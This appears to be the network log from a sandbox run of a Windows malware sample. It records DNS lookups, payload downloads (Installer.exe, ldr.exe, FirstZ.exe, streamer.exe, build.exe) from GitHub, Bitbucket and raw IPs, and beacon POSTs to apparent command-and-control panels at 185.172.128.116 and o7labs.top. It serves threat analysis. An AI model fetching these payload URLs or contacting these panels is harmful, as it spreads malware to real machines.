github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: CF78:1D8AF3:86EC7C:9680A9:667D7222
DNS

objects.githubusercontent.com

powershell.exe

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.108.133

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.109.133

objects.githubusercontent.com

IN A

185.199.111.133
GET

https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T140731Z&X-Amz-Expires=300&X-Amz-Signature=015e1618dfceb5f5bc7fefa9af04c8fbf3deb464ffd837da1edb09b3be780567&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream

axplong.exe

Remote address:

185.199.108.133:443

Request

GET /github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T140731Z&X-Amz-Expires=300&X-Amz-Signature=015e1618dfceb5f5bc7fefa9af04c8fbf3deb464ffd837da1edb09b3be780567&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream HTTP/1.1
Host: objects.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 158208
Content-Type: application/octet-stream
Last-Modified: Tue, 18 Jun 2024 12:59:30 GMT
ETag: "0x8DC8F967E22F003"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a623d972-601e-0061-4d7f-c1c216000000
x-ms-version: 2020-10-02
x-ms-creation-time: Tue, 18 Jun 2024 12:59:30 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=Installer.exe
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Age: 2626
Date: Thu, 27 Jun 2024 14:07:31 GMT
X-Served-By: cache-iad-kjyo7100172-IAD, cache-lcy-eglc8600082-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 2459, 0
X-Timer: S1719497251.496494,VS0,VE392
DNS

215.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.156.26.20.in-addr.arpa

IN PTR

Response
DNS

23.149.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.149.64.172.in-addr.arpa

IN PTR

Response
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
POST

http://185.172.128.116/Mb3GvQs8/index.php

Hkbsse.exe

Remote address:

185.172.128.116:80

Request

POST /Mb3GvQs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.116
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.172.128.116/Mb3GvQs8/index.php

Hkbsse.exe

Remote address:

185.172.128.116:80

Request

POST /Mb3GvQs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.116
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.172.128.116/FirstZ.exe

Hkbsse.exe

Remote address:

185.172.128.116:80

Request

GET /FirstZ.exe HTTP/1.1
Host: 185.172.128.116

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:32 GMT
Content-Type: application/octet-stream
Content-Length: 2665984
Last-Modified: Mon, 29 May 2023 20:39:56 GMT
Connection: keep-alive
ETag: "64750d9c-28ae00"
Accept-Ranges: bytes
POST

http://185.172.128.116/Mb3GvQs8/index.php

Hkbsse.exe

Remote address:

185.172.128.116:80

Request

POST /Mb3GvQs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.116
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

133.108.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.108.199.185.in-addr.arpa

IN PTR

Response

133.108.199.185.in-addr.arpa

IN PTR

cdn-185-199-108-133githubcom
GET

http://94.228.166.74/wp-includes/ldr.exe

axplong.exe

Remote address:

94.228.166.74:80

Request

GET /wp-includes/ldr.exe HTTP/1.1
Host: 94.228.166.74

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:32 GMT
Content-Type: application/octet-stream
Content-Length: 424960
Last-Modified: Wed, 19 Jun 2024 12:58:24 GMT
Connection: keep-alive
ETag: "6672d5f0-67c00"
Accept-Ranges: bytes
DNS

bit.ly

powershell.exe

Remote address:

8.8.8.8:53

Request

bit.ly

IN A

Response

bit.ly

IN A

67.199.248.10

bit.ly

IN A

67.199.248.11
DNS

bit.ly

powershell.exe

Remote address:

8.8.8.8:53

Request

bit.ly

IN A
DNS

74.166.228.94.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.166.228.94.in-addr.arpa

IN PTR

Response
GET

https://bit.ly/4c7L8Zs

powershell.exe

Remote address:

67.199.248.10:443

Request

GET /4c7L8Zs HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: bit.ly
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Thu, 27 Jun 2024 14:07:34 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 105
Cache-Control: private, max-age=90
Content-Security-Policy: referrer always;
Location: https://pixel.com/
Referrer-Policy: unsafe-url
Set-Cookie: _bit=o5re7y-a5b05e2c91dc21b382-00d; Domain=bit.ly; Expires=Tue, 24 Dec 2024 14:07:34 GMT
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

pixel.com

powershell.exe

Remote address:

8.8.8.8:53

Request

pixel.com

IN A

Response

pixel.com

IN A

54.67.42.145
DNS

10.248.199.67.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.248.199.67.in-addr.arpa

IN PTR

Response

10.248.199.67.in-addr.arpa

IN PTR

bitly
GET

https://pixel.com/

powershell.exe

Remote address:

54.67.42.145:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: pixel.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 27 Jun 2024 14:07:33 GMT
Connection:Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 366
Cache-Control: private, no-cache, no-store, max-age=0
Expires: Mon, 01 Jan 1990 0:00:00 GMT
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

145.42.67.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.42.67.54.in-addr.arpa

IN PTR

Response

145.42.67.54.in-addr.arpa

IN PTR

ec2-54-67-42-145 us-west-1compute amazonawscom
DNS

o7labs.top

Hkbsse.exe

Remote address:

8.8.8.8:53

Request

o7labs.top

IN A

Response

o7labs.top

IN A

94.228.166.74
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

bitbucket.org

axplong.exe

Remote address:

8.8.8.8:53

Request

bitbucket.org

IN A

Response

bitbucket.org

IN A

104.192.141.1
GET

https://bitbucket.org/sdgdf/fbghhj/downloads/streamer.exe

axplong.exe

Remote address:

104.192.141.1:443

Request

GET /sdgdf/fbghhj/downloads/streamer.exe HTTP/1.1
Host: bitbucket.org

Response

HTTP/1.1 302 Found

server: envoy
x-usage-quota-remaining: -273294.640
vary: Accept-Language, Origin
x-usage-request-cost: 860.80
cache-control: max-age=0, no-cache, no-store, must-revalidate, private
Content-Type: text/html; charset=utf-8
x-b3-traceid: ab668a18fa5d937a
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Thu, 27 Jun 2024 14:07:37 GMT
x-usage-user-time: 0.021937
x-usage-system-time: 0.003887
location: https://bbuseruploads.s3.amazonaws.com/bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/a70a0b74-852a-4474-9eae-6ea2b9ade276/streamer.exe?response-content-disposition=attachment%3B%20filename%3D%22streamer.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDGPNCCVQ&Signature=xGYVhTitVQKJWV1YIOHyutQc7wU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEYaCXVzLWVhc3QtMSJGMEQCIGnMm2OMBg3g0%2B59gEr0Yn6tV9gm0Iy6390%2B1hSU0BV%2FAiA3Cr52hMJ4tIw%2FsfShyCQaLqrB9Y4Y5LabjNovgZZD5iqwAgjv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMCl2z5hsRCKljxh%2FYKoQCep3JZRt5wn92PPnUW633N88ZQPLpCoyy0JvfyCX8jVzgZwXbwAY772Ir12TZ55ujgIlLlbvJWxnMid9SHxn1Nu0GI%2F885QsOgXGOFpwqMeubTxQFsI8HYfn%2BR1h0sZQqfX3tPFBMqhkCmWm12DnyO2o5jD1WOuzEzA5Bu7RdeZH42XRHZVIXFfRxq%2FwMlvb%2FNK61EpTcu2vCtAB4WYGNCh9yustnWGAgz7yPnV7%2FnZnzxzo58X6hCDSwJcdYyB0x9uPR2HE7J5ZELL8oT7yGK0aUm%2BYnawPBJchWWc1Sf0rS1OyaRkXI%2Fh5fYRXLtvxF1qhR87Y6l1G%2BwVc06R5NFtxT4R0wh%2BH1swY6ngEfPD5EIMC7tTBzt73viQQxFq4V9HSpghaGD1MUYdojU%2B4t3%2BnfhKH6xRO8CQxKz2LDnqV74itEpLOxleu8ym3RKzzonM6ox2hokIVAx36fmFbrEp%2F3vNmMSFfvx7sKpw6aioIepVCfIpDJ%2BSEjHxxF0Jg%2F5nWnUtp%2BwGlLZkqDZPbM9ZKF0mo4I3gZci%2BJ5%2BbO1rYGf5jlkEFzhibexA%3D%3D&Expires=1719498639
expires: Thu, 27 Jun 2024 14:07:37 GMT
x-served-by: 22e1de93c400
x-envoy-upstream-service-time: 59
content-language: en
x-usage-throttled: True
x-view-name: bitbucket.apps.downloads.views.download_file
x-b3-spanid: ab668a18fa5d937a
x-static-version: 0eb31668482a
x-render-time: 0.04784226417541504
Connection: keep-alive
x-usage-input-ops: 0
x-version: 0eb31668482a
x-request-count: 1845
x-frame-options: SAMEORIGIN
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET

https://bitbucket.org/sdgdf/fbghhj/downloads/build.exe

axplong.exe

Remote address:

104.192.141.1:443

Request

GET /sdgdf/fbghhj/downloads/build.exe HTTP/1.1
Host: bitbucket.org

Response

HTTP/1.1 302 Found

server: envoy
x-usage-quota-remaining: -269814.810
vary: Accept-Language, Origin
x-usage-request-cost: 996.43
cache-control: max-age=0, no-cache, no-store, must-revalidate, private
Content-Type: text/html; charset=utf-8
x-b3-traceid: 1974b6fe7ba924d3
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
content-security-policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Thu, 27 Jun 2024 14:07:53 GMT
x-usage-user-time: 0.027988
x-usage-system-time: 0.001905
location: https://bbuseruploads.s3.amazonaws.com/bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/925aca09-8171-4df5-9672-b014eb575c2b/build.exe?response-content-disposition=attachment%3B%20filename%3D%22build.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJRUG7J5N&Signature=Epl0KOTC8lg0Fz4JKCcVypH4PaA%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEYaCXVzLWVhc3QtMSJGMEQCIE%2BHVTXGemTUbrOtaikuqKKvmE3QV%2FzhLUJTXFr1PnyBAiBpURmnjYrXkR1SH56MeBpdFic304HJUKpNYAvk1v6knyqwAgjv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMm2s2wIqGNTrfGjaRKoQCVSaqpnN%2BJiceeABFd86CCwPvAjJXEQtgkhrukwMwPygvtn59lnTkC4T7oygKftcVPPFG6JHWgOcSLU1%2FEnCX6o3bB5Yz4qduAsfQ7Sgo1u5NvHwMFK50mZnJwbJmh311g91Snisj3JzIrD340LzeTTpzwwdguao2yJ7FSuj%2B5%2F32vAv51J4FHF7nIpwnTZBNVqnCOR%2BRWa926CyEf%2FoME2iQa0qlMY4ScPGU6yCk7U%2BVLVncaWHKsU5Yd2GD4AO%2FzcjeMsTAmk7rGwtc4SVdXwnf6rcTEfy1X%2Bbp8l3FPs9i0pcCC3RtEJEeztEQQP8Gr0dkRfkrrw0ew7h5nVOFp9HKklMwyN%2F1swY6ngFSKEp5NqRu5CPbpapHSjZOTFq0fiKvrFHnOo2kxhAY3OKqrbZBQNkIyJ9sH0v42luaOey5D2ZpuxX4Kf6%2Bt7HDg22kid4iFuU5xnKXb3J5RxuQo4RglAzrjBlIq6AxB%2Fi3f6fmFkJTXRZFCpHffYZdEqEgFiq97Z6%2BfI1Svfu8ONWwgzC%2FKDkAssoymtyC%2FaqN3XZPS7RNLLRqKhJLVw%3D%3D&Expires=1719498448
expires: Thu, 27 Jun 2024 14:07:53 GMT
x-served-by: 56bf4c8edc4c
x-envoy-upstream-service-time: 83
content-language: en
x-usage-throttled: True
x-view-name: bitbucket.apps.downloads.views.download_file
x-b3-spanid: 1974b6fe7ba924d3
x-static-version: 0eb31668482a
x-render-time: 0.07218241691589355
Connection: keep-alive
x-usage-input-ops: 0
x-version: 0eb31668482a
x-request-count: 1890
x-frame-options: SAMEORIGIN
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
POST

http://o7labs.top/online/support/index.php

Hkbsse.exe

Remote address:

94.228.166.74:80

Request

POST /online/support/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: o7labs.top
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://o7labs.top/online/support/index.php

Hkbsse.exe

Remote address:

94.228.166.74:80

Request

POST /online/support/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: o7labs.top
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

67.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.113.215.185.in-addr.arpa

IN PTR

Response
DNS

33.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.128.172.185.in-addr.arpa

IN PTR

Response
DNS

1.141.192.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.141.192.104.in-addr.arpa

IN PTR

Response
DNS

bbuseruploads.s3.amazonaws.com

axplong.exe

Remote address:

8.8.8.8:53

Request

bbuseruploads.s3.amazonaws.com

IN A

Response

bbuseruploads.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

52.217.33.244

s3-w.us-east-1.amazonaws.com

IN A

3.5.30.85

s3-w.us-east-1.amazonaws.com

IN A

3.5.22.215

s3-w.us-east-1.amazonaws.com

IN A

52.217.133.169

s3-w.us-east-1.amazonaws.com

IN A

52.217.172.153

s3-w.us-east-1.amazonaws.com

IN A

52.217.230.25

s3-w.us-east-1.amazonaws.com

IN A

54.231.228.233

s3-w.us-east-1.amazonaws.com

IN A

54.231.229.193
GET

https://bbuseruploads.s3.amazonaws.com/bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/a70a0b74-852a-4474-9eae-6ea2b9ade276/streamer.exe?response-content-disposition=attachment%3B%20filename%3D%22streamer.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDGPNCCVQ&Signature=xGYVhTitVQKJWV1YIOHyutQc7wU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEYaCXVzLWVhc3QtMSJGMEQCIGnMm2OMBg3g0%2B59gEr0Yn6tV9gm0Iy6390%2B1hSU0BV%2FAiA3Cr52hMJ4tIw%2FsfShyCQaLqrB9Y4Y5LabjNovgZZD5iqwAgjv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMCl2z5hsRCKljxh%2FYKoQCep3JZRt5wn92PPnUW633N88ZQPLpCoyy0JvfyCX8jVzgZwXbwAY772Ir12TZ55ujgIlLlbvJWxnMid9SHxn1Nu0GI%2F885QsOgXGOFpwqMeubTxQFsI8HYfn%2BR1h0sZQqfX3tPFBMqhkCmWm12DnyO2o5jD1WOuzEzA5Bu7RdeZH42XRHZVIXFfRxq%2FwMlvb%2FNK61EpTcu2vCtAB4WYGNCh9yustnWGAgz7yPnV7%2FnZnzxzo58X6hCDSwJcdYyB0x9uPR2HE7J5ZELL8oT7yGK0aUm%2BYnawPBJchWWc1Sf0rS1OyaRkXI%2Fh5fYRXLtvxF1qhR87Y6l1G%2BwVc06R5NFtxT4R0wh%2BH1swY6ngEfPD5EIMC7tTBzt73viQQxFq4V9HSpghaGD1MUYdojU%2B4t3%2BnfhKH6xRO8CQxKz2LDnqV74itEpLOxleu8ym3RKzzonM6ox2hokIVAx36fmFbrEp%2F3vNmMSFfvx7sKpw6aioIepVCfIpDJ%2BSEjHxxF0Jg%2F5nWnUtp%2BwGlLZkqDZPbM9ZKF0mo4I3gZci%2BJ5%2BbO1rYGf5jlkEFzhibexA%3D%3D&Expires=1719498639

axplong.exe

Remote address:

52.217.33.244:443

Request

GET /bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/a70a0b74-852a-4474-9eae-6ea2b9ade276/streamer.exe?response-content-disposition=attachment%3B%20filename%3D%22streamer.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDGPNCCVQ&Signature=xGYVhTitVQKJWV1YIOHyutQc7wU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEYaCXVzLWVhc3QtMSJGMEQCIGnMm2OMBg3g0%2B59gEr0Yn6tV9gm0Iy6390%2B1hSU0BV%2FAiA3Cr52hMJ4tIw%2FsfShyCQaLqrB9Y4Y5LabjNovgZZD5iqwAgjv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMCl2z5hsRCKljxh%2FYKoQCep3JZRt5wn92PPnUW633N88ZQPLpCoyy0JvfyCX8jVzgZwXbwAY772Ir12TZ55ujgIlLlbvJWxnMid9SHxn1Nu0GI%2F885QsOgXGOFpwqMeubTxQFsI8HYfn%2BR1h0sZQqfX3tPFBMqhkCmWm12DnyO2o5jD1WOuzEzA5Bu7RdeZH42XRHZVIXFfRxq%2FwMlvb%2FNK61EpTcu2vCtAB4WYGNCh9yustnWGAgz7yPnV7%2FnZnzxzo58X6hCDSwJcdYyB0x9uPR2HE7J5ZELL8oT7yGK0aUm%2BYnawPBJchWWc1Sf0rS1OyaRkXI%2Fh5fYRXLtvxF1qhR87Y6l1G%2BwVc06R5NFtxT4R0wh%2BH1swY6ngEfPD5EIMC7tTBzt73viQQxFq4V9HSpghaGD1MUYdojU%2B4t3%2BnfhKH6xRO8CQxKz2LDnqV74itEpLOxleu8ym3RKzzonM6ox2hokIVAx36fmFbrEp%2F3vNmMSFfvx7sKpw6aioIepVCfIpDJ%2BSEjHxxF0Jg%2F5nWnUtp%2BwGlLZkqDZPbM9ZKF0mo4I3gZci%2BJ5%2BbO1rYGf5jlkEFzhibexA%3D%3D&Expires=1719498639 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

x-amz-id-2: qcStEXgw5cPibud8Xxk1uGoPzJtgto/4BJuqh1BYtLj1NQWJBNFdS/MxyyFZepJT6GAP+EpKXdM=
x-amz-request-id: F8NRHY3NYRQ8XZ0K
Date: Thu, 27 Jun 2024 14:07:40 GMT
Last-Modified: Thu, 27 Jun 2024 09:03:04 GMT
ETag: "fb1f0eda3ce4cb3fa7b9913ecc4c78ef-2"
x-amz-server-side-encryption: AES256
x-amz-version-id: 0YzVNZYhZTBzYpKgbeothqKT3AG_.P53
Content-Disposition: attachment; filename="streamer.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 8828928
GET

https://github.com/frielandrews892/File/releases/download/File/File.zip

powershell.exe

Remote address:

20.26.156.215:443

Request

GET /frielandrews892/File/releases/download/File/File.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Thu, 27 Jun 2024 14:07:38 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/bff378a0-db1f-4958-863d-f942e941cea1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T140738Z&X-Amz-Expires=300&X-Amz-Signature=d67dbfa86479e323624991f0ecefb271d71aca6d369ab2367f3a7afa57fc8874&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DFile.zip&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ 